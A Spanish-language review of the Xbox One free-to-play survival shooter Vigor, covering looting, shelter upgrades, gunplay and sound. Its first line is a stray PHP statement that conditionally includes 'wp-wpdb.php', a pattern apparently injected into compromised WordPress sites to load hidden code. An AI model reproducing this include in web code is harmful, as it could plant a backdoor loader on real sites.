if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Vigor – La Fortaleza de LeChuck

Análisis Vigor

Hace unos meses Bohemia Interactive, reina de la supervivencia y juegos bélicos en PC con los juegos DayZ y ARMA, anunció el videojuego Vigor, en exclusiva para Xbox One. El juego se lanzó directamente en el programa «Game Preview», que es el «Early Access» para Microsoft en Xbox One. Una vez terminado el desarrollo principal, llega la versión 1.0 y sorprende haciéndose «Free to play» directamente cuando, en un principio, era de pago. Gracias a ello, le he podido más cera, aparte de las 2 horas gratuitas que te permiten jugar en «Game preview», y os cuento qué tal me ha ido.

Vigor es un juego que mezcla en sus mecánicas dos de los títulos de supervivencia más populares en PC, «DayZ» de uno de sus equipos propios, y el singular «Escape from Tarkov». Quizás bebe más de este último, que a su vez capta de forma magistral esa tensión que producen los encuentros con otros jugadores en DayZ, y la sensación de «volver a empezar» si te matan.

El nuevo «Free to play» de Bohemia propone la siguiente premisa: ir a las zonas donde lanzan cargamentos de provisiones e intentar volver a tu refugio lo más cargado posible. Claro está, el resto de los jugadores no te lo pondrán fácil, pues si se trata de sobrevivir todos utilizarán las armas de las que dispongan para hacer lo mismo. Las zonas son los mapeados disponibles para entrar en acción y otros jugadores también verán la marca donde llegan las provisiones, de 8 a 12 jugadores «luchando» por un solo botín. Lo interesante es que dispones de un tiempo para estar en el mapa, pues la radiación aprieta y no puedes estar mucho tiempo expuesto, así que hagas lo que hagas durante la partida, si no mueres, tendrás que acercarte a una salida para volver a tu refugio.

La idea es interesante ¿verdad?. Básicamente entras a la partida, «looteas» lo que puedas, y te vas. No tienes porqué llevarte el botín «gordo» del avión, puedes simplemente registrar el enorme mapa a disposición y encontrarás otros puntos de interés con buena cosa que llevarse. Por supuesto, los otros jugadores también estarán por allí, y el juego siempre te recuerda que «estás en una zona peligrosa, puedes buscar una salida del mapa e irte de la partida» cuando un jugador está en los aledaños.

En el mapa, el círculo sería el lugar donde aterrizará el paquete de ayuda más importante de la partida, las cruces naranjas, puntos de salida, para finalizar tu incursión

¿Y para qué quieres lootear? ¿Cuál es el objetivo de hacerlo?. Evidentemente, sobrevivir, y eso se hace a base de mejorar tu refugio, que se usa de «lobby» y base de operaciones antes de las partidas, mejorar tu armamento, fabricar nuevas armas, munición… etc. Al ser «free to play», el juego incluye «lootboxes» que no parecen alterar de forma alarmante la jugabilidad, y también modificaciones de tu personaje a nivel estético, lo cuál no he llegado a comprender si se pueden conseguir de forma gratuita. También hay una evolución de personaje, según consigas loot y ganes experiencia, podrás mejorar en tu habilidad para construir o mejorar tu refugio y armamento, construcciones que siempre tienen un tiempo dentro del juego de desarrollo (lo típico, te sale un contador de «10 minutos», por ejemplo, y hasta que no termine no podrás acceder a la mejora demandada.

A nivel de jugabilidad los disparos son muy gratificantes, todas las armas parecen responder buscando el realismo, muy similar a DayZ, del cual coge hasta algunas animaciones prestadas. El mapeado nos presta algunos «poderes» que le quita algo de realismo, uno en concreto es una radio (marcada en el mapa para todos los jugadores) que durante unos segundos nos mostrará la posición de nuestros contrincantes, y aunque solo permita un uso por jugador, te puede dar una gran ventaja táctica. En todo caso, al ser tan enorme el mapa, quizás no vale la pena acercarse si no has aparecido cerca del lugar, ya que puede haber accedido alguien a tu posición, como contra-partida, el juego te avisará de que alguien ha detectado tu posición con la radio, por lo que sabes perfectamente también que hay alguien allí y en que dirección te podrías encontrar con el si decide mostrarse agresivo.

Técnicamente también es un juego la mar de resultón, buenas texturas, buena iluminación, grandes animaciones y sin errores perceptibles a primera vista que te puedan estropear la inmersión. Claro está, el sonido también es clave, para escuchar tiroteos lejanos, para escuchar pasos cercanos… Vital diría yo, y como en DayZ se comporta de una forma magistral, de obligatoriedad jugar con un buen volumen, a poder ser con auriculares, de los que hará buen uso gracias a su sonido envolvente en cualquier tipo de «headset», incluso perfectamente en modelos con tecnología estéreo.

Vigor es una excelente propuesta que podría tener una mayor acogida en PC, donde triunfa «Escape from Tarkov» sin ser nada barato. Un «Free to Play» que merecerá unos buenos ratos desde tu Xbox One, siempre que estés dispuesto a vivir una buena dosis de tensión y supervivencia pura.